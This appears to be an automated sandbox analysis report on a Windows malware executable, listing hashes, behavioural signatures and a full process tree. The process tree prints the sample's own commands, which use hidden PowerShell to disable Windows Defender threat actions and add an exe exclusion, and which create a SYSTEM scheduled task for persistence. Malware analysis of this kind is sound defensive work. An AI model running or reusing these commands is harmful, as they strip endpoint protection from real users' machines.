Analysis

  • max time kernel
    161s
  • max time network
    286s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    17/05/2024, 00:13 UTC

General

  • Target

    cf613c83fd006ca96400f5e5cf2646edd93cc0755782021b52499084480d1f4d.exe

  • Size

    7.3MB

  • MD5

    6ab93856657f98664025489aff89ea78

  • SHA1

    6045d673642fd3bb832bf7289022d1b37d11de17

  • SHA256

    cf613c83fd006ca96400f5e5cf2646edd93cc0755782021b52499084480d1f4d

  • SHA512

    d3a083eebcbe8f271540ca2fa636c15599cf268e82097bc9bb8f2f5d2773461b9505426519baecf40c51390e83ad980ab565710fc821c3aecb71e475add37a1f

  • SSDEEP

    196608:91OPAOeH0m2q6X7123fIOt75sZeSi7xIYcmAiME:3OYO98PvtViZUx2O

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 3 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 35 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 58 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\cf613c83fd006ca96400f5e5cf2646edd93cc0755782021b52499084480d1f4d.exe
    "C:\Users\Admin\AppData\Local\Temp\cf613c83fd006ca96400f5e5cf2646edd93cc0755782021b52499084480d1f4d.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:412
    • C:\Users\Admin\AppData\Local\Temp\7zS72FD.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:428
      • C:\Users\Admin\AppData\Local\Temp\7zS74E2.tmp\Install.exe
        .\Install.exe /LiwdidB "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:4056
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3160
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1672
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:368
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                  PID:192
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4808
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                6⤵
                • Suspicious use of WriteProcessMemory
                PID:4644
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  7⤵
                    PID:2560
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1556
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:212
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                    7⤵
                      PID:1536
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                  5⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1508
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                    6⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1384
                    • \??\c:\windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                      7⤵
                        PID:1380
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1704
                    • C:\Windows\SysWOW64\cmd.exe
                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:912
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:4204
                        • C:\Windows\SysWOW64\gpupdate.exe
                          "C:\Windows\system32\gpupdate.exe" /force
                          8⤵
                            PID:3696
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2012
                    • C:\Windows\SysWOW64\cmd.exe
                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4796
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                        6⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:5092
                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                          7⤵
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3140
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /CREATE /TN "butYHpXTvMdZIJsEKZ" /SC once /ST 00:14:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS74E2.tmp\Install.exe\" LY /gNNdidcqgj 525403 /S" /V1 /F
                    4⤵
                    • Drops file in Windows directory
                    • Creates scheduled task(s)
                    PID:2928
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn butYHpXTvMdZIJsEKZ"
                    4⤵
                      PID:2220
                      • C:\Windows\SysWOW64\cmd.exe
                        /C schtasks /run /I /tn butYHpXTvMdZIJsEKZ
                        5⤵
                          PID:488
                          • \??\c:\windows\SysWOW64\schtasks.exe
                            schtasks /run /I /tn butYHpXTvMdZIJsEKZ
                            6⤵
                              PID:1236
                  • C:\Users\Admin\AppData\Local\Temp\7zS74E2.tmp\Install.exe
                    C:\Users\Admin\AppData\Local\Temp\7zS74E2.tmp\Install.exe LY /gNNdidcqgj 525403 /S
                    1⤵
                    • Executes dropped EXE
                    • Drops desktop.ini file(s)
                    • Drops file in System32 directory
                    • Modifies data under HKEY_USERS
                    PID:4344
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                      2⤵
                        PID:4832
                        • C:\Windows\SysWOW64\forfiles.exe
                          forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                          3⤵
                            PID:2080
                            • C:\Windows\SysWOW64\cmd.exe
                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                              4⤵
                                PID:2192
                                • \??\c:\windows\SysWOW64\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                  5⤵
                                    PID:2964
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                3⤵
                                  PID:2936
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                    4⤵
                                      PID:2332
                                      • \??\c:\windows\SysWOW64\reg.exe
                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                        5⤵
                                          PID:4772
                                    • C:\Windows\SysWOW64\forfiles.exe
                                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                      3⤵
                                        PID:1064
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                          4⤵
                                            PID:1460
                                            • \??\c:\windows\SysWOW64\reg.exe
                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                              5⤵
                                                PID:1984
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                            3⤵
                                              PID:3920
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                4⤵
                                                  PID:2792
                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                    5⤵
                                                      PID:876
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                  3⤵
                                                    PID:700
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                      4⤵
                                                        PID:872
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                          5⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          • Drops file in System32 directory
                                                          • Modifies data under HKEY_USERS
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:692
                                                          • C:\Windows\SysWOW64\gpupdate.exe
                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                            6⤵
                                                              PID:4856
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                      2⤵
                                                      • Drops file in System32 directory
                                                      • Modifies data under HKEY_USERS
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2704
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                        3⤵
                                                          PID:432
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                            4⤵
                                                              PID:4020
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                            3⤵
                                                              PID:1976
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                              3⤵
                                                                PID:4948
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                3⤵
                                                                  PID:1492
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                  3⤵
                                                                    PID:1852
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                    3⤵
                                                                      PID:516
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                      3⤵
                                                                        PID:2084
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                        3⤵
                                                                          PID:4364
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                          3⤵
                                                                            PID:2416
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                            3⤵
                                                                              PID:5084
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                              3⤵
                                                                                PID:4308
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                3⤵
                                                                                  PID:1964
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                  3⤵
                                                                                    PID:5056
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                    3⤵
                                                                                      PID:1584
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                      3⤵
                                                                                        PID:196
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                        3⤵
                                                                                          PID:696
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                          3⤵
                                                                                            PID:2968
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                            3⤵
                                                                                              PID:5064
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                              3⤵
                                                                                                PID:2164
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                3⤵
                                                                                                  PID:2592
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                  3⤵
                                                                                                    PID:4900
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                    3⤵
                                                                                                      PID:4480
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                      3⤵
                                                                                                        PID:3788
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                        3⤵
                                                                                                          PID:3712
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                          3⤵
                                                                                                            PID:2188
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                            3⤵
                                                                                                              PID:4336
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                              3⤵
                                                                                                                PID:628
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                3⤵
                                                                                                                  PID:3068
